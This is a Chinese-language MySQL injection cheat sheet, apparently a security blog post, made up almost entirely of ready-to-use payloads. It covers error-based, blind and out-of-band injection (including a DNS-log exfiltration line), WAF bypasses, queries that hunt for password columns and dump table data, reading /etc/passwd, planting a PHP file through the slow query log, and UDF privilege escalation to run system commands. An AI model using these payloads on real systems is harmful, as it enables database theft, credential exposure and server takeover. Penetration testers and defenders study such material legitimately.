MySQL 注入备忘录
字数 473 2025-08-11 08:36:35
MySQL 注入技术全面指南
1. MySQL 注入基础
1.1 检测POC
错误注入POC
extractvalue(1,0x214d79357131) # 0x214D79357131 == '!My5q1'
updatexml(1,0x214d79357131,1)
时间盲注POC
sleep(6)
benchmark(pow(10,9),md5(0))
OOB带外数据POC
load_file('\\\\{host}1{parameter}.{dnslog}\\i') # Windows UNC路径
1.2 边界构造技术
'|{poc}|'
"||{poc}||"
{poc}If(0,1,{poc})
asc,{poc}asc,
If(0,1,{poc})all {poc},
{raw_number} PrOcEdUrE AnAlYsE(eXTraCTvaLUe(1,{poc}),1)
(SeLEcT!{poc})
{raw_string}|{poc}{raw_string}`|{poc}|`
1.3 宽字节注入
\x81'|{poc}#
\x81'|{poc})#
\x81'|{poc}))#
\x81"|{poc}#
\x81"|{poc})#
2. WAF绕过技术
2.1 注释绕过
SELECT/*!19999(table_name*//*!19999)a*/FROM(select!0)t/*!19999,*//*!19999information_schema*//*!19999.*//*!19999tables*/
SELECT{a(table_name)}FROM{x(/*!19999information_schema*//*!19999.*//*!19999tables*/)}
select++++/*xxx*/++user()#
2.2 注释符变种
SELECT 1, 2, 3/*!12345UNION SELECT 4, 5, 6*/;
SELECT 1, 2, 3/*!UNION SELECT 4, 5, 6*/;
SELECT 1#comment;
SELECT 1-- comment;
SELECT/*comment*/1;
2.3 空白字符替代
%09 %0A %0B %0C %0D %20
3. 信息收集技术
3.1 当前SQL查询
SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST WHERE INFO LIKE '%673245283%' LIMIT 1
SELECT SUBSTRING_INDEX(INFO,{prefix},1) FROM PROCESSLIST WHERE INFO LIKE '%673245283%'
SELECT SUBSTRING_INDEX(INFO,{suffix},-1) FROM PROCESSLIST WHERE INFO LIKE '%673245283%'
3.2 系统信息收集
SELECT concat_ws(0x0a,ifnull(@@secure_file_priv,0),
concat_ws(0x3a, @@version, @@version_compile_os, @@version_compile_machine, @@version_comment),
concat_ws(0x3a, @@hostname, @@port),
concat_ws(0x3a, user(), database()),
concat_ws(0x3a, @@datadir, @@plugin_dir, @@tmpdir, @@basedir))
3.3 权限检查
SELECT (SELECT super_priv FROM mysql.user WHERE user=substring_index(user(), 0x40, 1) LIMIT 1)='Y'
SELECT super_priv FROM mysql.user WHERE user={user} LIMIT 1
4. 数据枚举技术
4.1 搜索敏感列
SELECT table_schema,table_name,column_name FROM information_schema.columns
WHERE column_name RLIKE 'password|passwd|pwd'
SELECT group_concat(concat_ws(0x2c,table_schema,table_name,column_name) separator 0x0a)
FROM (SELECT * FROM information_schema.columns WHERE column_name RLIKE 'password|passwd|pwd' LIMIT 0,5)t
4.2 列信息枚举
SELECT column_name,column_type,is_nullable FROM information_schema.columns
WHERE table_schema={db} AND table_name={table} LIMIT 0,5
SELECT group_concat(concat_ws(0x2c,column_name,column_type,is_nullable) separator 0x0a)
FROM (SELECT * FROM information_schema.columns WHERE table_schema={db} AND table_name={table} LIMIT 0,5)t
4.3 数据导出
SELECT {column1},{column2},{column3} FROM {table} WHERE 1=1 LIMIT 0,5
SELECT group_concat(concat_ws('1qAZ',ifnull({column1},0x20),ifnull({column2},0x20),ifnull({column3},0x20)) separator '2wSX')
FROM (SELECT * FROM {table} WHERE 1=1 LIMIT 0,5)t
5. 文件操作技术
5.1 文件读取
SELECT load_file('/etc/passwd')
SELECT hex(load_file('/etc/passwd'))
SELECT CONVERT(LOAD_FILE('/etc/passwd') USING utf8)
CREATE TABLE tmp_blob(tmp BLOB);
LOAD DATA INFILE 'C:\\tools\\tmp\\1.txt' INTO TABLE tmp_blob;
select tmp from tmp_blob;
5.2 文件写入
SELECT null,0x3eff3e,null INTO OUTFILE 'C:\\tools\\tmp\\8.txt'
FIELDS TERMINATED BY '' LINES TERMINATED BY ''
SELECT null,0x3eff3e,null INTO DUMPFILE 'C:\\tools\\tmp\\8.txt'
5.3 日志文件利用
set global slow_query_log_file='/var/www/api_test.php';
set global slow_query_log=1;
SELECT 'xxxx', sleep(@@long_query_time+1)
6. 命令执行技术
6.1 UDF提权条件
- MySQL版本≥5.1:udf文件必须放置于lib\plugin目录
- MySQL版本<5.1:Windows2003下放置于c:\windows\system32,Windows2000下放置于c:\winnt\system32
6.2 UDF提权步骤
SELECT @@plugin_dir
select 1 into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'
select 1 into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'
SELECT 0xffff INTO DUMPFILE 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\udf.dll'
create function runsh returns string soname 'udf.dll';
select runsh('whoami');
drop function runsh;
7. 高级注入技术
7.1 错误注入技术
SELECT * FROM information_schema.tables WHERE 1=1 AND
(SELECT 1 FROM (SELECT MIN(1),CONCAT(({payload}), RAND(98)>0.5)x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a limit 1)
SELECT * FROM information_schema.tables WHERE 1=1 AND
LineString((select 1 from (select * from ({payload})a)b))
SELECT * FROM information_schema.tables WHERE 1=1 AND
ExtractValue(1, concat(0x2a, ({payload})))
SELECT * FROM information_schema.tables WHERE 1=1 AND
GTID_SUBSET(({payload}),1)
SELECT * FROM information_schema.tables WHERE 1=1 AND
json_keys(concat(0x2a, ({payload})))
SELECT * FROM information_schema.tables WHERE 1=1 AND
exp(~1+(select * from ({payload})a))
7.2 时间盲注
sleep(5)
benchmark(pow(10,8),md5(0))
('xxxxxxxxxxxx' rlike '((((x+y')
('xxxxxxxxxxxx' regexp '((((x+y')
(select-count(*)from`information_schema`.columns`1`,`information_schema`.columns`2`,`information_schema`.columns`3`,`information_schema`.columns`4`)
7.3 二次注入
sleep(5)'|sleep(5)|'
"|sleep(5)|"
benchmark(pow(10,8),md5(0))'|benchmark(pow(10,8),md5(0))|'
8. 实用备忘录
8.1 常用函数
CAST({expr} AS NCHAR)
CONVERT({expr} ,NCHAR)
LENGTH({str})
CHAR_LENGTH({str})
IFNULL({expr},' ')
MID({str},{pos},{len})
CONCAT({str1},{str2},...)
CONCAT_WS({sep},{str1},{str2},...)
GROUP_CONCAT([DISTINCT] expr [,expr ...] [ORDER BY {unsigned_integer col_name}])
IF({expr1}, {expr2}, {expr3})
CASE WHEN {expr1} THEN {expr2} ELSE {expr3} END
HEX({str})
8.2 加密函数
HEX('abc')
UNHEX('616263')
TO_BASE64('abc')
FROM_BASE64('JWJj')
COMPRESS('abc')
UNCOMPRESS(COMPRESS('abc'))
ENCODE('abcdef', 'pass')
DECODE(ENCODE('abcdef', 'pass'), 'pass')
AES_ENCRYPT('abcdef', 'pass')
AES_DECRYPT(AES_ENCRYPT('abcdef', 'pass'), 'pass')
8.3 系统变量
@@secure_file_priv
@@version
@@version_compile_os
@@version_compile_machine
@@version_comment
@@hostname
@@port
@@datadir
@@plugin_dir
@@tmpdir
@@basedir
@@slow_query_log
@@slow_query_log_file
@@long_query_time
@@log_error
@@general_log
@@general_log_file